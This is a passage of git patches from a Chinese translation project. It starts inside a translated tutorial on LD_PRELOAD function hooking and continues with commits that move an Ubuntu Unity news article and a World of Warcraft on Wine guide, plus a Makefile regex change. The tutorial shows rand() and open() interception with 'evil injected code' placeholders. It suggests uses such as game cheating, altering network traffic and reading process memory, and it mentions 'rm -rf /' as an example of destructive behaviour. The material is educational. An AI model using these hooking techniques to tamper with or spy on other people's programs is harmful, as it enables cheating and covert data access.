rand(),而是使用了我们提供的 – 它每次都返回 42。 + +##### **但是,我们 *告诉* 它去使用真实的那个。我们设置它去使用真实的那个。另外,在创建那个程序的时候,假冒的 rand() 甚至并不存在!** + +这并不完全正确。我们只能告诉它去使用 rand(),但是我们不能去选择哪个 rand() 是我们希望我们的程序去使用的。 + +当我们的程序启动后,(为程序提供需要的函数的)某些库被加载。我们可以使用 _ldd_ 去学习它是怎么工作的: + +> ``` +> $ ldd random_nums +> linux-vdso.so.1 => (0x00007fff4bdfe000) +> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000) +> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000) +> ``` + +正如你看到的输出那样,它列出了被程序 `random_nums` 所需要的库的列表。这个列表是构建进可执行程序中的,并且它是在编译时决定的。在你的机器上的精确的输出可能与示例有所不同,但是,一个 **libc.so** 肯定是有的 – 这个文件提供了核心的 C 函数。它包含了 “真正的” rand()。 + +我使用下列的命令可以得到一个全部的函数列表,我们看一看 libc 提供了哪些函数: + +> ``` +> nm -D /lib/libc.so.6 +> ``` + +这个 _nm_  命令列出了在一个二进制文件中找到的符号。-D 标志告诉它去查找动态符号,因此 libc.so.6 是一个动态库。这个输出是很长的,但它确实在很多的其它标准函数中列出了 rand()。 + +现在,在我们设置了环境变量 LD_PRELOAD 后发生了什么?这个变量 **为一个程序强制加载一些库**。在我们的案例中,它为 `random_num` 加载了 _unrandom.so_,尽管程序本身并没有这样去要求它。下列的命令可以看得出来: + +> ``` +> $ LD_PRELOAD=$PWD/unrandom.so ldd random_nums +> linux-vdso.so.1 => (0x00007fff369dc000) +> /some/path/to/unrandom.so (0x00007f262b439000) +> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000) +> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000) +> ``` + +注意,它列出了我们当前的库。实际上这就是代码为什么被运行的原因:`random_num` 调用了 rand(),但是,如果 `unrandom.so` 被加载,它调用的是我们提供的实现了 rand() 的库。很清楚吧,不是吗? + +#### 更清楚地了解 + +这还不够。我可以用相似的方式注入一些代码到一个应用程序中,并且用这种方式它能够使用函数正常工作。如果我们使用一个简单的 “return 0” 去实现 open() 你就明白了。我们看到这个应用程序就像发生了故障一样。这是 **显而易见的**, 真实地去调用原始的 open: + +inspect_open.c: +``` +int open(const char *pathname, int flags){ + /* Some evil injected code goes here. */ + return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so +} +``` + +嗯,不完全是。这将去调用 “原始的” open(…)。显然,这是一个无休止的回归调用。 + +怎么去访问这个 “真正的” open 函数呢?它需要去使用程序接口进行动态链接。它听起来很简单。我们来看一个完整的示例,然后,我将详细解释到底发生了什么: + +inspect_open.c: + +``` +#define _GNU_SOURCE +#include + +typedef int (*orig_open_f_type)(const char *pathname, int flags); + +int open(const char *pathname, int flags, ...) +{ + /* Some evil injected code goes here. */ + + orig_open_f_type orig_open; + orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open"); + return orig_open(pathname,flags); +} +``` + +_dlfcn.h_ 是被 _dlsym_ 函数所需要,我们在后面会用到它。那个奇怪的 _#define_ 是命令编译器去允许一些非标准的东西,我们需要它去启用 _dlfcn.h_ 中的 `RTLD_NEXT`。那个 typedef 只是创建了一个函数指针类型的别名,它的参数是原始的 open – 别名是 `orig_open_f_type`,我们将在后面用到它。 + +我们定制的 open(…) 的主体是由一些代码构成。它的最后部分创建了一个新的函数指针 `orig_open`,它指向原始的 open(…) 函数。为了得到那个函数的地址,我们请求 _dlsym_ 去为我们查找,接下来的 “open” 函数在动态库栈上。最后,我们调用了那个函数(传递了与我们的假冒 ”open" 一样的参数),并且返回它的返回值。 + +我使用下面的内容作为我的 “邪恶的注入代码”: + +inspect_open.c (fragment): + +``` +printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h! +``` + +去完成它,我需要稍微调整一下编译参数: + +> ``` +> gcc -shared -fPIC  inspect_open.c -o inspect_open.so -ldl +> ``` + +我增加了 _-ldl_ ,因此,它将共享库连接 _libdl_ ,它提供了 _dlsym_ 函数。(不,我还没有创建一个假冒版的 _dlsym_ ,不过这样更有趣) + +因此,结果是什么呢?一个共享库,它实现了 open(…) 函数,除了它 _输出_ 文件路径以外,其它的表现和真正的 open(…) 函数 **一模一样**。:-) + +如果这个强大的诀窍还没有说服你,是时候去尝试下面的这个示例了: + +> ``` +> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator +> ``` + +我鼓励你去看自己实验的结果,但是基本上,它实时列出了这个应用程序可以访问到的每个文件。 + +我相信它并不难去想像,为什么这可以用于去调试或者研究未知的应用程序。请注意,那只是部分的诀窍,并不是全部,因此 _open()_ 不仅是一个打开文件的函数 … 例如,在标准库中也有一个 _open64()_ ,并且为了完整地研究,你也需要为它去创建一个假冒的。 + +#### **可能的用法** + +如果你一直跟着我享受上面的过程,让我推荐一个使用这个诀窍能做什么的一大堆创意。记住,你可以在不损害原始应用程序的同时做任何你想做的事情! + +1. ~~获得 root 权限~~ 你想多了!你不会通过这种方法绕过安全机制的。(一个专业的解释是:如果 ruid != euid,库不会通过这种方法预加载的。) + +2. 欺骗游戏:**取消随机化** 这是我演示的第一个示例。对于一个完整的工作案例,你将需要去实现一个定制的 `random()` 、`rand_r()`、`random_r()`,也有一些应用程序是从`/dev/urandom` 中读取,或者,因此你可以通过使用一个修改的文件路径去运行原始的 `open()` 重定向它们到 `/dev/null`。而且,一些应用程序可能有它们自己的随机数生成算法,这种情况下你似乎是没有办法的(除非,按下面的第 10 点去操作)。但是对于一个新手来说,它看起来并不容易上手。 + +3. 欺骗游戏:**子弹时间** 实现所有的与标准时间有关的函数,让假冒的时间变慢两倍,或者十倍。如果你为时间测量正确地计算了新值,与时间相关的 `sleep` 函数、和其它的、受影响的应用程序将相信这个时间,(根据你的愿望)运行的更慢(或者更快),并且,你可以体验可怕的 “子弹时间” 的动作。或者 **甚至更进一步**,让你的共享库也可以成为一个 DBus 客户端,因此你可以使用它进行实时的通讯。绑定一些快捷方式到定制的命令,并且在你的假冒的时间函数上使用一些额外的计算,让你可以有能力按你的意愿去启用&禁用慢进或者快进任何时间。 + +4. 研究应用程序:**列出访问的文件** 它是我演示的第二个示例,但是这也可以进一步去深化,通过记录和监视所有应用程序的文件 I/O。 + +5. 研究应用程序:**监视因特网访问** 你可以使用 Wireshark 或者类似软件达到这一目的,但是,使用这个诀窍你可以真实地获得控制应用程序基于 web 发送了什么,而不仅是看看,但是也会影响到数据的交换。这里有很多的可能性,从检测间谍软件到欺骗多用户游戏,或者分析&& 逆向工程使用闭源协议的应用程序。 + +6. 研究应用程序:**检查 GTK 结构** 为什么只局限于标准库?让我们在所有的 GTK 调用中注入一些代码,因此我们可以学习到一个应用程序使用的那些我们并不知道的玩意儿,并且,知道它们的构成。然后这可以渲染出一个图像或者甚至是一个 gtkbuilder 文件!如果你想去学习怎么去做一些应用程序的接口管理,这个方法超级有用! + +7. **在沙盒中运行不安全的应用程序** 如果你不信任一些应用程序,并且你可能担心它会做一些如 `rm -rf /`或者一些其它的不希望的文件激活,你可以通过修改它传递到所有文件相关的函数(不仅是 _open_ ,它也可以删除目录),去重定向它所有的文件 I/O 到诸如 `/tmp` 这里。还有更难的如 chroot 的诀窍,但是它也给你提供更多的控制。它会和完全 “封装” 一样安全,并且除了你真正知道做了什么以外,这种方法不会真实的运行任何恶意软件。 + +8. **实现特性** [zlibc][1] 是明确以这种方法运行的一个真实的库;它可以在访问时解压文件,因此,任何应用程序都可以在无需实现解压功能的情况下访问压缩数据。 + +9. **修复 bugs** 另一个现实中的示例是:不久前(我不确定现在是否仍然如此)Skype – 它是闭源的软件 – 从某些网络摄像头中捕获视频有问题。因为 Skype 并不是自由软件,源文件不能被修改,就可以通过使用预加载一个解决了这个问题的库的方式来修复这个 bug。 + +10. 手工方式 **访问应用程序拥有的内存**。请注意,你可以通过这种方式去访问所有应用程序的数据。如果你有类似的软件,如 CheatEngine/scanmem/GameConqueror 这可能并不会让人惊讶,但是,它们都要求 root 权限才能工作。LD_PRELOAD 不需要。事实上,通过一些巧妙的诀窍,你注入的代码可以访问任何应用程序的内存,从本质上看,是因为它是通过应用程序自身来得以运行的。你可以在应用程序可以达到的范围之内通过修改它做任何的事情。你可以想像一下,它允许你做许多的低级别的侵入 … ,但是,关于这个主题,我将在某个时候写一篇关于它的文章。 + +这里仅是一些我想到的创意。我希望你能找到更多,如果你做到了 – 通过下面的评论区共享出来吧! + +-------------------------------------------------------------------------------- + +via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/ + +作者:[Rafał Cieślak][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rafalcieslak.wordpress.com/ +[1]:http://www.zlibc.linux.lu/index.html + + From bbf69dc44a6e7825e4811c9e359e176b33d2854e Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 15 Dec 2017 14:13:33 +0800 Subject: [PATCH 0584/1627] =?UTF-8?q?=E6=94=BE=E9=94=99=E4=BD=8D=E7=BD=AE?= =?UTF-8?q?=E4=BA=86=E3=80=82=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171202 docker - Use multi-stage builds.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename 20171202 docker - Use multi-stage builds.md => published/20171202 docker - Use multi-stage builds.md (100%) diff --git a/20171202 docker - Use multi-stage builds.md b/published/20171202 docker - Use multi-stage builds.md similarity index 100% rename from 20171202 docker - Use multi-stage builds.md rename to published/20171202 docker - Use multi-stage builds.md From bf3e50dbfe6679601931e8ac36e1b1c04ca4e3c8 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 15 Dec 2017 14:16:39 +0800 Subject: [PATCH 0585/1627] PRF&PUB:20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md @geekpi --- ...Unity from the Dead as an Official Spin.md | 41 +++++++++++++++++++ ...Unity from the Dead as an Official Spin.md | 41 ------------------- 2 files changed, 41 insertions(+), 41 deletions(-) create mode 100644 published/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md delete mode 100644 translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md diff --git a/published/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/published/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md new file mode 100644 index 0000000000..34850b75eb --- /dev/null +++ b/published/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md @@ -0,0 +1,41 @@ +有人试图挽救 Ubuntu Unity ,将其做为官方分支 +============================================================ + +> Ubuntu Unity Remix 将支持九个月。 + +![](http://i1-news.softpedia-static.com/images/news2/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778-2.jpg) + +Canonical 在七年之后突然决定抛弃它的 Unity 用户界面影响了许多 Ubuntu 用户,现在看起来有人试图把它从死亡中带回来,成为官方分支spin。 + +长期 [Ubuntu][1] 成员 Dale Beaudoin 上周在官方的 Ubuntu 论坛上[进行了一项调查][2]来了解社区意向,看看他们是否对随同明年的 Ubuntu 18.04 LTS(Bionic Beaver)一起发布的 Ubuntu Unity Remix 感兴趣,它将支持 9 个月或 5 年。 + +有 30 人进行了投票,其中 67% 的人选择了所谓的 Ubuntu Unity Remix 的 LTS(长期支持)版本,33% 的人投票支持 9 个月的支持版本。看起来这个即将到来的 Ubuntu Unity Spin [看起来会成为官方特色版本][3],而这意味着开发它的承诺。 + +Dale Beaudoin 表示:“最近的一项民意调查显示,2/3 的人支持 Ubuntu Unity 成为 LTS 发行版,我们应该按照它成为 LTS 和官方特色版的更新周期去努力。我们将尝试使用当前默认的 Ubuntu Bionic Beaver 18.04 的每日构建版本作为平台,每周或每 10 天发布一次更新的 ISO。” + +### Ubuntu Unity 是否会卷土重来? + +正常情况下,最后一个带有 Unity 的 Ubuntu 版本应该是 Ubuntu 17.04(Zesty Zapus),它将在 2018 年 1 月终止支持。当前流行操作系统的稳定版本 Ubuntu 17.10(Artful Artful),是今年早些时候 Canonical CEO [宣布][4]之后第一个默认使用 GNOME 桌面环境的版本,Unity 将不再开发。 + +然而,Canonical 仍然在官方软件仓库提供 Unity 桌面环境,所以如果有人想要安装它,只需点击一下即可。但坏消息是,它们支持到 2018 年 4 月发布 Ubuntu 18.04 LTS(Bionic Beaver)之前,所以 Ubuntu Unity Remix 的开发者们将不得不在独立的仓库中继续支持。 + +另一方面,我们不相信 Canonical 会改变主意,接受这个 Ubuntu Unity Spin 成为官方的特色版,这意味着他们不会继续开发 Unity,现在只有一小部分人可以做这个开发。最有可能的是,如果对 Ubuntu Unity Remix 的兴趣没有很快消失,那么,这可能会是一个由怀旧社区支持的非官方版本。 + +问题是,你会对 Ubuntu Unity Spin 感兴趣么,官方或者非官方? + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778.shtml + +作者:[Marius Nestor][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:http://linux.softpedia.com/downloadTag/Ubuntu +[2]:https://community.ubuntu.com/t/poll-unity-7-distro-9-month-spin-or-lts-for-18-04/2066 +[3]:https://community.ubuntu.com/t/unity-maintenance-roadmap/2223 +[4]:http://news.softpedia.com/news/canonical-to-stop-developing-unity-8-ubuntu-18-04-lts-ships-with-gnome-desktop-514604.shtml +[5]:http://news.softpedia.com/editors/browse/marius-nestor diff --git a/translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md deleted file mode 100644 index 6bbb37ae57..0000000000 --- a/translated/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md +++ /dev/null @@ -1,41 +0,0 @@ -有人试图将 Ubuntu Unity 非正式地从死亡带回来 -============================================================ - - - -> Ubuntu Unity Remix 将支持九个月 - -Canonical 在七年之后突然决定抛弃它的 Unity 用户界面影响了许多 Ubuntu 用户,看起来有人现在试图非正式地把它从死亡中带回来。 - -长期 [Ubuntu][1] 成员 Dale Beaudoin 上周在官方的 Ubuntu 论坛上[进行了一项调查][2]来了解社区,看看他们是否对明年发布的 Ubuntu 18.04 LTS(Bionic Beaver)的 Ubuntu Unity Remix 感兴趣,它将支持 9 个月或 5 年。 - -有 30 人进行了投票,其中 67% 的人选择了所谓的 Ubuntu Unity Remix 的 LTS(长期支持)版本,33% 的人投票支持 9 个月的支持版本。它也看起来像即将到来的 Ubuntu Unity Spin [看起来会成为官方版本][3],但这不意味着开发它的承诺。 - -Dale Beaudoin 表示:“最近的一项民意调查显示,2/3 的人支持 Ubuntu Unity 成为 LTS 发行版,我们应该尝试这个循环,假设它将是 LTS 和官方的风格。“我们将尝试使用当前默认的 Ubuntu Bionic Beaver 18.04 的每日版本作为平台每周或每 10 天发布一次更新的 ISO。” - -### Ubuntu Unity 是否会卷土重来? - -默认情况下,最后一个带有 Unity 的 Ubuntu 版本是 Ubuntu 17.04(Zesty Zapus),它将在 2018 年 1 月终止支持。当前流行操作系统的稳定版本 Ubuntu 17.10(Artful Artful),是今年早些时候 Canonical CEO [宣布][4]之后第一个默认使用 GNOME 桌面环境的版本,Unity 将不再开发。 - -然而,Canonical 仍然从官方软件仓库提供 Unity 桌面环境,所以如果有人想要安装它,只需点击一下即可。但坏消息是,它们支持到 2018 年 4 月发布 Ubuntu 18.04 LTS(Bionic Beaver)之前,所以 Ubuntu Unity Remix 的开发者们将不得不在独立的仓库中继续支持。 - -另一方面,我们不相信 Canonical 会改变主意,接受这个 Ubuntu Unity Spin 成为官方的风格,这意味着他们无法继续开发 Unity,现在只有一小部分人可以做到这一点。最有可能的是,如果对 Ubuntu Unity Remix 的兴趣没有很快消失,那么,这可能会是一个由怀旧社区支持的非官方版本。 - -问题是,你会对 你会对Ubuntu Unity Spin 感兴趣么,官方或者非官方? - --------------------------------------------------------------------------------- - -via: http://news.softpedia.com/news/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778.shtml - -作者:[Marius Nestor ][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://news.softpedia.com/editors/browse/marius-nestor -[1]:http://linux.softpedia.com/downloadTag/Ubuntu -[2]:https://community.ubuntu.com/t/poll-unity-7-distro-9-month-spin-or-lts-for-18-04/2066 -[3]:https://community.ubuntu.com/t/unity-maintenance-roadmap/2223 -[4]:http://news.softpedia.com/news/canonical-to-stop-developing-unity-8-ubuntu-18-04-lts-ships-with-gnome-desktop-514604.shtml -[5]:http://news.softpedia.com/editors/browse/marius-nestor From 9e30a1ebd1a98f0ed0ca944756d837a04809a5a6 Mon Sep 17 00:00:00 2001 From: Wenxuan Zhao Date: Thu, 14 Dec 2017 22:23:26 -0800 Subject: [PATCH 0586/1627] Change to Strict Rule --- Makefile | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Makefile b/Makefile index 48e9183ea7..002f5d83ba 100644 --- a/Makefile +++ b/Makefile @@ -18,28 +18,28 @@ $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: - [ $(shell grep '^A\s\+sources/' $(CHANGE_FILE) | wc -l) -ge 1 ] - [ $(shell grep -v '^A\s\+sources/' $(CHANGE_FILE) | wc -l) = 0 ] + [ $(shell grep '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] + [ $(shell grep -v '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: - [ $(shell grep '^M\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-completed: - [ $(shell grep '^D\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' rule-translation-revised: - [ $(shell grep '^M\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-published: - [ $(shell grep '^D\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+published/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+published/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' From 8559cb50369f2426bde92f746172f287aa09690d Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 15 Dec 2017 16:14:44 +0800 Subject: [PATCH 0587/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2015=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=BA=94=2016:14:4?= =?UTF-8?q?4=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ay World of Warcraft On Linux With Wine.md | 107 ------------------ ...ay World of Warcraft On Linux With Wine.md | 107 ++++++++++++++++++ 2 files changed, 107 insertions(+), 107 deletions(-) delete mode 100644 sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md create mode 100644 translated/tech/20170928 How to Play World of Warcraft On Linux With Wine.md diff --git a/sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md b/sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md deleted file mode 100644 index 00f32793dc..0000000000 --- a/sources/tech/20170928 How to Play World of Warcraft On Linux With Wine.md +++ /dev/null @@ -1,107 +0,0 @@ -translating by lujun9972 -How to Play World of Warcraft On Linux With Wine -====== - -### Objective - -Install and run Word of Warcraft on Linux - -### Distributions - -This will work with nearly all Linux distributions. - -### Requirements - -A working Linux install with root privileges and a somewhat modern graphics card with the latest graphics drivers installed. - -### Difficulty - -Easy - -### Conventions - - * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command - * **$** \- given command to be executed as a regular non-privileged user - - - -### Introduction - -World of Warcraft has been around for almost thirteen years, and it's still easily the most popular MMORPG. Unfortunately, after all that time Blizzard never released an official Linux client. It's not all bad, tough. Wine has you covered. - -### Install Wine - -You can try regular Wine, but it's not the best for getting the latest improvements in gaming performance. Wine Staging and Wine with the Gallium Nine patches are almost universally better. If you're using proprietary drivers, Wine Staging is the best option. For Mesa drivers, make sure that Gallium Nine support is compiled in(it probably is), and use Wine with the Gallium patches. - -Refer to our - -### Winecfg - -Open up `winecfg`. On the first tab, make sure the that version of Windows is set to `Windows 7`. Blizzard dropped support for all prior versions. Next, head to the "Staging" tab. The options you choose here depend on whether you're running the staging or Gallium patches. - -![Winecfg Staging Settings][1] -Everyone should check the boxes to enable VAAPI and EAX. Hiding the Wine version is up to you. - -If you're using the Staging patches, check the box to enable CSMT. If you're on Gallium Nine, check that box. You can't have both. - -### Winetricks - -This next part requires Winetricks. If you're not familiar with it, Winetricks is a script that you can use to install various Windows libraries and components in Wine to help programs run. You can read more about it in our - -![Winetricks Corefonts Installed][2] -There are only a couple of things that you need to get WoW, and more importantly the Battle.net launcher, to work. First, install `corefonts` under the "Fonts" section. This next part is optional, but if you want all of the data from the Internet to display in the Battle.net client, you need to install `ie8` from the DLL section. - -### Battle.net - -Now that you have Wine set up and ready, you can install the Battle.net app. The Battle.net app serves as the installer and update utility for WoW and other Blizzard games. It's also known for misbehaving after updates. Be sure to check - -You can download the Battle.net app from - -When the download completes, open the `.exe` with Wine, and follow the install instructions. Everything here should go normally and will be exactly the same as running it natively on Windows. - -![Battle.net Launcher With WoW Installed][3] -After the app is done installing, sign in or create your account. It'll then take you to the launcher where you can install and manage your games. Start installing WoW. It will take a while. - -### Launch The Game - - -![WoW Advanced Settings][4] -You should be able to start up WoW with the "Play" button in the Battle.net app. It'll take a few minutes for the login screen to appear, and it'll probably perform like garbage. That's because WoW uses DX11 by default now. Head to the settings, and under the "Advanced" tab, set the graphics API to DX9. Save, and exit the game. Open it back up again after it exists successfully - -The game should be playable now. Keep in mind that performance will be highly dependent on your hardware. WoW is a CPU bound game, and Wine adds additional CPU overhead. If you don't have a powerful CPU, you'll probably be feeling the negative effects. WoW does have low presets, though, so you can tune down the graphics to get it working. - -#### Performance Tuning - - -![WoW Graphics Settings][5] -It's really hard to say what settings will work best for you and your system. WoW has a very simple sliding scale in the basic settings. If you've been playing on Windows, drop it by a couple of levels. The performance simply isn't as good. - -Always try turning down the obvious culprits first. Settings like anti-aliasing and particles are usually to blame for poor performance. Also, take a look at windowed vs. fullscreen. Sometimes it's amazing how much of a difference there is between the two. - -WoW also has an option for raid and battleground settings. This creates a separate set of options for more graphically intense content in raid and battleground instances. Sometimes WoW performs great in the open world, but drops to trash when there's a lot of players on screen. - -Experiment and see what works best for your system. It all depends on your hardware and your system configuration. - -### Closing Thoughts - -World of Warcraft has never been released for Linux, but it has worked in Wine for years. In fact, it's hard to think of any time when it hasn't worked. There have even been rumors that Blizzard developers test it in Wine to make sure that it remains functional. - -With that said, changes and patches do impact this venerable game, so always be on your toes if something breaks. Regardless, there is almost always a solution right around the corner, you just need to find it. - - --------------------------------------------------------------------------------- - -via: https://linuxconfig.org/how-to-play-world-of-warcraft-on-linux-with-wine - -作者:[Nick Congleton][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://linuxconfig.org -[1]:https://linuxconfig.org/images/wow-wine-staging.jpg -[2]:https://linuxconfig.org/images/wow-wine-corefonts.jpg -[3]:https://linuxconfig.org/images/wow-bnet.jpg -[4]:https://linuxconfig.org/images/wow-api.jpg -[5]:https://linuxconfig.org/images/wow-settings.jpg diff --git a/translated/tech/20170928 How to Play World of Warcraft On Linux With Wine.md b/translated/tech/20170928 How to Play World of Warcraft On Linux With Wine.md new file mode 100644 index 0000000000..9831674979 --- /dev/null +++ b/translated/tech/20170928 How to Play World of Warcraft On Linux With Wine.md @@ -0,0 +1,107 @@ +如何使用 Wine 在 Linux 下玩魔兽世界 +====== + +### 目标 + +在 Linux 中运行魔兽世界 + +### 发行版 + +适用于几乎所有的 Linux 发行版。 + +### 要求 + +具有 root 权限的 linux 系统,搭配上比较现代化的显卡并安装了最新的图形驱动程序。 + +### 难度 + +简单 + +### 约定 + + * # - 要求以 root 权限执行命令,可以直接用 root 用户来执行也可以使用 `sudo` 命令 + * $ - 使用普通非特权用户执行 + +### 简介 + +魔兽世界已经出现差不多有 13 年了,但它依然是最流行的 MMORPG。 不幸的是, 这段时间以来暴雪从来没有发不过一个官方的 Linux 客户端。 不过还好,我们有 Wine。 + +### 安装 Wine + +你可以试着用一下普通的 Wine,但它在游戏性能方面改进不大。 Wine Staging 以及带 Gallium Nine 补丁的 Wine 几乎在各方面都要更好一点。 如果你使用了闭源的驱动程序, 那么 Wine Staging 是最好的选择。 若使用了 Mesa 驱动程序, 则还需要打上 Gallium Nine 补丁。 + +根据你使用的发行版,参考 [Wine install guide][6] 来安装。 + +### Winecfg + +打开 `winecfg`。确保第一个标签页中的 Windows 版本已经设置成了 `Windows 7`。 暴雪不再对之前的版本提供支持。 然后进入 "Staging" 标签页。 这里根据你用的是 staging 版本的 Wine 还是 打了 Gallium 补丁的 Wine 来进行选择。 + +![Winecfg Staging Settings][1] +不管是哪个版本的 Wine,都需要启用 VAAPI 以及 EAX。 至于是否隐藏 Wine 的版本则由你自己决定。 + +如果你用的是 Staging 补丁,则启用 CSMT。 如果你用的是 Gallium Nine,则启用 Gallium Nine。 但是你不能两个同时启用。 + +### Winetricks + +下一步轮到 Winetricks 了。如果你对它不熟,那我告诉你, Winetricks 一个用来为 Wine 安装各种 Windows 库以及组件以便程序正常运行的脚本。 更多信息可以阅读我们的这篇文章[Winetricks guide][7]: + +![Winetricks Corefonts Installed][2] +要让 WoW 以及战网启动程序(Battle.net launcher)工作需要安装一些东西。首先,在 “Fonts” 部分中安装 `corefonts`。 然后下面这一步是可选的, 如果你希望在战网启动程序中现实所有互联网上的数据的话,就还需要安装 DLL 部分中的 `ie8`。 + + +### Battle.net + +现在你配置好了 Wine 了,可以安装 Battle.net 应用了。 Battle.net 应用用来安装和升级 WoW 以及其他暴雪游戏。 它经常在升级后会出现问题。 因此若它突然出现问题,请查看 [WineHQ 页面][8]。 + +毫无疑问,你可以从 [Blizzard 的官网上][9] 下载 Battle.net 应用 + +下载完毕后,使用 Wine 打开 `.exe` 文件, 然后按照安装指引一步步走下去,就跟在 Windows 上一样。 + +![Battle.net Launcher With WoW Installed][3] +应用安装完成后,登陆/新建帐号就会进入启动器界面。 你在那可以安装和管理游戏。 然后开始安装 WoW。 这可得好一会儿。 + +### 运行游戏 + +![WoW Advanced Settings][4] +在 Battle.net 应用中点击 “Play” 按钮就能启动 WoW 了。你需要等一会儿才能出现登陆界面, 这个性能简直堪称垃圾。 之所以这么慢是因为 WoW 默认使用 DX11 来加速。 进入设置窗口中的“Advanced”标签页, 设置图像 API 为 DX9。 保存然后退出游戏。 退出成功后再重新打开游戏。 + +现在游戏应该可以玩了。请注意,游戏的性能严重依赖于你的硬件水平。 WoW 是一个很消耗 CPU 的游戏, 而 Wine 更加加剧了 CPU 的负担。 如果你的 CPU 不够强劲, 你的体验会很差。 不过 WoW 支持低特效,因此你可以调低画质让游戏更流畅。 + +#### 性能调优 + +![WoW Graphics Settings][5] +很难说什么样的设置最适合你。WoW 在基本设置中有一个很简单的滑动比例条。 它的配置应该要比在 Windows 上低几个等级,毕竟这里的性能不像 Windows 上那么好。 + +先调低最可能的罪魁祸首。像抗锯齿和粒子就常常会导致低性能。 另外,试试对比一下窗口模式和全屏模式。 有时候这两者之间的差距还是蛮大的。 + +WoW 对 raid 以及 battleground 有专门的配置项。raid 以及 battleground 实例中的内容需要更精细的画面。 有时间 WoW 在开放地图中表现不错, 